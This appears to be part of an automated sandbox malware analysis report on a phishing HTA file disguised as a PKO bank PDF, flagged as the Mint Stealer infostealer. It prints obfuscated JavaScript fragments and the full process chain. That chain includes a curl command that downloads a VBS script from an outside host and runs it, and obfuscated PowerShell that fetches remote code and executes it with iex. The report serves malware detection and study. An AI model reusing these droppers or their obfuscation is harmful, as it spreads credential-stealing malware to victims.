                                                                                                                            2024-12-17 15:30:16 UTC7915INData Raw: 76 61 72 20 74 68 65 68 69 73 30 77 6f 75 6c 64 73 6f 76 65 72 65 69 67 6e 74 79 20 3d 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 3b 0a 66 75 6e 63 74 69 6f 6e 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 28 6e 6f 74 68 69 73 74 6f 72 79 2c 20 74 68 65 77 69 74 68 29 20 7b 0a 20 20 20 20 76 61 72 20 77 6f 75 6c 64 73 6f 76 65 72 65 69 67 6e 74 79 20 3d 20 74 68 65 68 69 73 30 6e 6f 74 68 69 73 74 6f 72 79 28 29 3b 0a 20 20 20 20 74 68 65 68 69 73 30 74 68 65 77 69 74 68 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 61 6e 64 72 65 77 66 6f 72 63 65 73 2c 20 73 75 63 68 74 68 65 29 20 7b 0a 20 20 20 20 20 20 20 20 61 6e 64 72 65 77 66 6f 72 63 65 73 20 3d 20 61 6e 64 72 65 77 66 6f 72 63 65 73 20 2d 20 28 30 78 35 31 37 20 2a 20 30 78 31 20 2b 20 30 78 31 36 62
                                                                                                                            Data Ascii: var thehis0wouldsovereignty = thehis0thewith;function thehis0thewith(nothistory, thewith) { var wouldsovereignty = thehis0nothistory(); thehis0thewith = function (andrewforces, suchthe) { andrewforces = andrewforces - (0x517 * 0x1 + 0x16b
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 44 46 53 76 73 34 68 20 3d 20 30 78 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 64 46 53 76 73 34 68 20 3d 20 30 78 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 53 44 46 53 76 73 34 68 20 3d 20 30 78 30 3b 20 53 44 46 53 76 73 34 68 20 3c 20 41 46 73 47 61 33 72 76 7a 5b 27 6c 65 6e 67 74 68 27 5d 3b 20 53 44 46 53 76 73 34 68 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 44 46 53 76 73 34 68 20 3d 20 28 73 44 46 53 76 73 34 68 20 2b 20 30 78 31 29 20 25 20 30 78 31 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 64 46 53 76 73 34 68 20 3d 20 28 53 64 46 53 76 73 34
                                                                                                                            Data Ascii: } sDFSvs4h = 0x0; SdFSvs4h = 0x0; for (var SDFSvs4h = 0x0; SDFSvs4h < AFsGa3rvz['length']; SDFSvs4h++) { sDFSvs4h = (sDFSvs4h + 0x1) % 0x100; SdFSvs4h = (SdFSvs4
                                                                                                                            2024-12-17 15:30:16 UTC8000INData Raw: 20 43 48 41 50 54 45 52 20 72 65 73 74 65 64 20 74 68 65 20 73 79 73 74 65 6d 20 73 65 6e 73 69 74 69 76 65 6e 65 73 73 20 74 68 65 6d 20 44 49 4e 47 49 4e 47 20 6d 61 69 6e 74 61 69 6e 20 6c 69 62 65 72 74 79 20 31 33 34 20 74 68 65 20 77 6f 75 6c 64 20 6d 65 6e 74 69 6f 6e 65 64 20 66 72 65 65 64 6f 6d 20 49 4e 54 52 4f 44 55 43 54 4f 52 59 20 52 65 76 6f 6c 75 74 69 6f 6e 20 76 69 6e 64 69 63 61 74 65 64 0a 2f 2f 4d 65 6c 76 69 6c 6c 65 20 66 61 63 74 6f 72 20 48 69 6c 6c 20 73 63 68 6f 6c 61 72 20 4d 65 6c 76 69 6c 6c 65 20 74 68 65 20 73 68 6f 77 20 52 65 76 6f 6c 75 74 69 6f 6e 20 74 68 65 20 54 48 45 20 74 68 65 20 53 63 6f 74 74 69 73 68 20 5f c3 a9 6c 69 74 65 5f 20 6b 69 6e 67 20 74 68 65 20 64 75 72 69 6e 67 20 6e 65 76 65 72 20 74 68 69 73 20
                                                                                                                            Data Ascii: CHAPTER rested the system sensitiveness them DINGING maintain liberty 134 the would mentioned freedom INTRODUCTORY Revolution vindicated//Melville factor Hill scholar Melville the show Revolution the THE the Scottish _lite_ king the during never this
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 68 65 20 74 68 65 20 50 72 65 6c 61 63 79 20 68 61 73 20 74 68 65 20 64 65 65 70 6c 79 20 6c 69 62 65 72 74 79 20 61 6e 64 20 74 68 65 79 20 74 68 61 6e 20 74 6f 67 65 74 68 65 72 20 4c 4f 52 44 53 20 54 68 65 20 74 68 61 74 20 65 63 63 6c 65 73 69 61 73 74 69 63 61 6c 20 67 72 65 61 74 65 73 74 20 73 74 72 75 67 67 6c 65 20 4a 6f 73 65 70 68 20 6f 6e 6c 79 20 6d 65 6d 62 65 72 73 20 44 69 61 72 79 20 68 61 73 20 74 68 69 73 20 70 72 6f 62 6c 65 6d 73 20 74 68 65 20 4d 69 6e 6f 72 20 77 61 73 20 72 65 6c 69 67 69 6f 75 73 20 74 68 65 20 74 68 61 74 20 61 6c 73 6f 20 6e 61 74 69 6f 6e 20 68 61 76 65 20 64 61 79 20 66 61 6d 65 0a 2f 2f 74 69 74 6c 65 20 68 61 73 20 74 68 65 20 70 61 74 72 69 6f 74 69 73 6d 20 56 49 49 20 70 6f 77 65 72 66 75 6c 20 66 6f 72
                                                                                                                            Data Ascii: he the Prelacy has the deeply liberty and they than together LORDS The that ecclesiastical greatest struggle Joseph only members Diary has this problems the Minor was religious the that also nation have day fame//title has the patriotism VII powerful for
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 6c 61 75 67 68 20 6e 61 74 75 72 61 6c 20 74 68 65 20 46 41 4d 4f 55 53 20 66 61 6d 65 20 73 68 6f 75 6c 64 20 74 68 65 20 66 6f 72 65 69 67 6e 20 42 75 72 74 6f 6e 20 61 6e 64 20 73 79 73 74 65 6d 20 62 75 74 20 73 65 6e 73 65 20 54 48 45 20 46 69 72 73 74 20 74 68 61 74 20 72 65 73 70 65 63 74 20 73 61 79 73 20 4c 65 74 20 68 69 67 68 20 70 65 72 73 75 61 64 65 64 20 61 6e 64 20 42 75 74 20 77 61 73 20 77 61 73 20 72 65 69 67 6e 73 20 4a 6f 73 65 70 68 20 54 68 65 20 74 68 65 20 73 79 73 74 65 6d 20 74 68 69 73 20 69 6e 74 6f 6c 65 72 61 62 6c 65 0a 2f 2f 64 69 64 20 77 65 72 65 20 67 6f 76 65 72 6e 6d 65 6e 74 20 73 68 6f 77 6e 20 65 6c 69 63 69 74 65 64 20 4c 4f 4e 44 4f 4e 20 47 72 65 65 6b 20 66 72 6f 6d 20 43 6f 6e 73 74 61 62 6c 65 20 61 62 6c 65
                                                                                                                            Data Ascii: laugh natural the FAMOUS fame should the foreign Burton and system but sense THE First that respect says Let high persuaded and But was was reigns Joseph The the system this intolerable//did were government shown elicited LONDON Greek from Constable able
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 72 65 20 61 6e 64 20 73 69 62 6e 65 73 73 20 74 68 65 20 77 69 6c 6c 20 74 68 65 20 50 72 6f 74 65 73 74 61 6e 74 69 73 6d 0a 2f 2f 4b 49 4e 47 20 6d 6f 73 74 20 61 6e 64 20 61 6e 64 20 74 68 65 20 69 6e 74 65 72 65 73 74 20 79 6f 6b 65 20 77 61 73 20 74 68 65 20 74 68 65 20 74 68 65 20 63 72 69 70 70 6c 65 20 74 68 65 20 66 6f 72 20 70 72 6f 6d 6f 74 65 64 20 6c 61 73 74 69 6e 67 20 65 78 63 65 6c 6c 65 6e 63 65 20 63 6f 6e 63 65 72 6e 65 64 20 70 72 6f 62 61 62 6c 79 20 66 6f 75 6e 64 20 74 68 65 20 74 68 65 20 68 61 73 20 64 61 79 20 77 61 73 20 62 65 65 6e 20 74 68 65 20 77 69 74 68 20 6d 61 74 74 65 72 73 20 77 68 61 74 65 76 65 72 20 73 74 61 6e 64 20 6f 76 65 72 20 6e 6f 74 20 74 68 65 20 75 6e 64 6f 20 74 68 65 69 72 20 77 61 73 20 6f 74 68 65 72
                                                                                                                            Data Ascii: re and sibness the will the Protestantism//KING most and and the interest yoke was the the the cripple the for promoted lasting excellence concerned probably found the the has day was been the with matters whatever stand over not the undo their was other
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 61 74 69 6f 6e 61 6c 20 66 6f 72 20 63 6f 6e 63 65 72 6e 69 6e 67 20 65 66 66 65 63 74 20 6d 61 6b 65 20 74 68 65 20 72 65 73 74 65 64 20 6f 75 72 20 70 65 72 69 6f 64 20 70 6f 77 65 72 20 31 36 38 38 20 53 63 6f 74 6c 61 6e 64 20 46 41 4c 4b 4c 41 4e 44 20 68 65 72 20 74 68 65 20 61 6e 64 20 4d 45 4c 56 49 4c 4c 45 20 66 61 6d 65 20 31 33 34 20 74 68 61 74 20 66 6f 72 65 69 67 6e 20 43 4f 4e 54 45 4e 54 53 20 74 68 61 6e 0a 2f 2f 6f 6e 63 65 20 74 68 61 74 20 4d 4f 52 54 4f 4e 20 77 61 73 20 42 75 74 20 77 68 69 63 68 20 45 64 69 6e 62 75 72 67 68 20 6f 75 72 20 54 68 65 72 65 20 62 65 65 6e 20 74 68 65 20 72 65 73 6f 72 74 20 6c 65 61 72 6e 65 64 20 6f 6e 65 20 6e 6f 74 20 43 48 41 50 54 45 52 20 74 68 61 6e 20 74 68 65 20 65 69 74 68 65 72 20 69 6e 66
                                                                                                                            Data Ascii: ational for concerning effect make the rested our period power 1688 Scotland FALKLAND her the and MELVILLE fame 134 that foreign CONTENTS than//once that MORTON was But which Edinburgh our There been the resort learned one not CHAPTER than the either inf
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 6d 65 6e 74 20 6f 6e 6c 79 20 63 68 61 70 74 65 72 20 77 65 72 65 20 74 68 69 73 20 68 69 67 68 65 73 74 20 74 6f 6f 20 77 61 73 20 74 68 65 20 70 6f 77 65 72 66 75 6c 20 31 33 34 20 77 65 72 65 20 6c 65 61 64 65 72 20 74 68 61 74 20 74 68 65 20 74 68 65 20 74 68 65 20 43 72 69 65 20 73 61 69 64 20 74 68 61 74 20 63 6f 75 6c 64 20 6c 69 62 65 72 74 79 20 50 72 65 73 62 79 74 65 72 69 61 6e 73 20 73 61 76 65 64 20 61 6e 64 20 62 75 74 20 70 72 6f 6d 6f 74 65 64 20 43 68 75 72 63 68 20 74 68 65 20 61 6e 64 20 63 61 6d 65 20 61 6e 64 20 68 69 73 20 74 68 65 20 43 68 75 72 63 68 20 6c 61 75 67 68 20 73 79 73 74 65 6d 20 69 6e 74 65 72 65 73 74 20 70 61 74 72 69 6f 74 69 73 6d 20 31 38 39 39 0a 2f 2f 6c 61 6e 64 20 74 68 65 20 69 6e 74 65 72 65 73 74 20 4c 61
                                                                                                                            Data Ascii: ment only chapter were this highest too was the powerful 134 were leader that the the the Crie said that could liberty Presbyterians saved and but promoted Church the and came and his the Church laugh system interest patriotism 1899//land the interest La
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 6f 6e 65 20 69 6e 74 65 72 65 73 74 20 74 68 65 20 61 6e 64 20 64 69 73 65 73 74 65 65 6d 65 64 20 74 68 65 20 73 6f 76 65 72 65 69 67 6e 74 79 20 74 68 61 74 20 53 63 6f 74 20 45 4e 47 4c 41 4e 44 20 70 65 6f 70 6c 65 20 43 6f 6e 73 74 61 62 6c 65 20 67 6f 76 65 72 6e 6d 65 6e 74 20 74 68 65 20 74 68 65 20 66 6f 72 63 65 73 20 65 63 63 6c 65 73 69 61 73 74 69 63 61 6c 20 77 69 74 68 0a 2f 2f 6f 6e 65 20 61 6c 6c 20 43 48 41 50 54 45 52 20 31 33 34 20 61 6e 64 20 50 72 6f 74 65 73 74 61 6e 74 69 73 6d 20 6f 74 68 65 72 20 66 6f 72 20 77 61 73 20 47 49 46 54 20 77 69 74 68 20 61 6e 79 20 4d 45 4c 56 49 4c 4c 45 20 53 45 44 41 4e 20 63 6f 75 6e 74 72 79 6d 65 6e 20 76 69 74 61 6c 20 74 77 6f 20 61 6e 64 20 43 68 75 72 63 68 20 41 53 53 45 4d 42 4c 49 45 53
                                                                                                                            Data Ascii: one interest the and disesteemed the sovereignty that Scot ENGLAND people Constable government the the forces ecclesiastical with//one all CHAPTER 134 and Protestantism other for was GIFT with any MELVILLE SEDAN countrymen vital two and Church ASSEMBLIES
                                                                                                                            2024-12-17 15:30:17 UTC8000INData Raw: 20 69 6e 74 65 72 65 73 74 20 53 63 6f 74 74 69 73 68 20 73 70 69 72 69 74 65 64 20 43 48 41 50 54 45 52 20 65 6e 74 65 72 70 72 69 73 65 73 20 73 61 79 73 20 74 68 65 20 45 4e 47 4c 41 4e 44 20 62 65 65 6e 20 74 72 75 74 68 20 70 6f 6c 69 63 79 20 61 64 76 61 6e 63 65 64 0a 2f 2f 64 75 74 69 65 73 20 74 68 65 69 72 20 66 61 6d 65 20 6b 69 6e 64 20 72 65 70 72 65 73 65 6e 74 61 74 69 76 65 73 20 70 61 74 72 69 6f 74 69 73 6d 20 68 65 72 20 69 6e 64 69 76 69 64 75 61 6c 20 74 72 75 6c 79 20 73 74 72 75 67 67 6c 65 20 74 68 65 20 31 31 36 20 61 6e 64 20 68 69 73 20 4d 65 6c 76 69 6c 6c 65 20 72 65 73 6f 72 74 20 70 6f 6c 65 6d 69 63 20 6f 75 72 20 56 49 49 49 20 46 6f 6f 74 6e 6f 74 65 73 20 74 68 65 20 74 68 65 20 73 74 72 75 67 67 6c 65 20 6f 6e 65 20 68
                                                                                                                            Data Ascii: interest Scottish spirited CHAPTER enterprises says the ENGLAND been truth policy advanced//duties their fame kind representatives patriotism her individual truly struggle the 116 and his Melville resort polemic our VIII Footnotes the the struggle one h


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:10:30:01
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:mshta.exe "C:\Users\user\Desktop\PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta"
                                                                                                                            Imagebase:0x520000
                                                                                                                            File size:13'312 bytes
                                                                                                                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:2
                                                                                                                            Start time:10:30:07
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
                                                                                                                            Imagebase:0x240000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:3
                                                                                                                            Start time:10:30:07
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:4
                                                                                                                            Start time:10:30:07
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\curl.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs
                                                                                                                            Imagebase:0x630000
                                                                                                                            File size:470'528 bytes
                                                                                                                            MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:5
                                                                                                                            Start time:10:30:09
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs
                                                                                                                            Imagebase:0x240000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:6
                                                                                                                            Start time:10:30:10
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:7
                                                                                                                            Start time:10:30:10
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"
                                                                                                                            Imagebase:0xc30000
                                                                                                                            File size:147'456 bytes
                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:8
                                                                                                                            Start time:10:30:10
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs
                                                                                                                            Imagebase:0x240000
                                                                                                                            File size:236'544 bytes
                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:9
                                                                                                                            Start time:10:30:10
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:10
                                                                                                                            Start time:10:30:11
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs"
                                                                                                                            Imagebase:0xc30000
                                                                                                                            File size:147'456 bytes
                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:12
                                                                                                                            Start time:10:30:15
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js
                                                                                                                            Imagebase:0xc30000
                                                                                                                            File size:147'456 bytes
                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:13
                                                                                                                            Start time:10:30:16
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\pmxdhq.js
                                                                                                                            Imagebase:0xc30000
                                                                                                                            File size:147'456 bytes
                                                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:14
                                                                                                                            Start time:10:30:16
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:15
                                                                                                                            Start time:10:30:16
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 0000000F.00000002.1967997619.0000021C0FA47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:16
                                                                                                                            Start time:10:30:18
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:conhost --headless powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:17
                                                                                                                            Start time:10:30:18
                                                                                                                            Start date:17/12/2024
                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                            File size:452'608 bytes
                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Has exited:true

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Executed Functions

                                                                                                                              Function 063E0FE7 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000003.1828876954.00000000063E0000.00000010.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_3_63e0000_mshta.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                              • Instruction ID: 60583c026d2b6ff5c029b7772b2734be6da6b2c4978fc2104f0dd9312e2ff3b5
                                                                                                                              • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                                                                              • Instruction Fuzzy Hash:

                                                                                                                              Executed Functions

                                                                                                                              Function 00007FFD9B8C1706 Relevance: .7, Instructions: 698COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000F.00000002.1990103510.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_15_2_7ffd9b8c0000_powershell.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
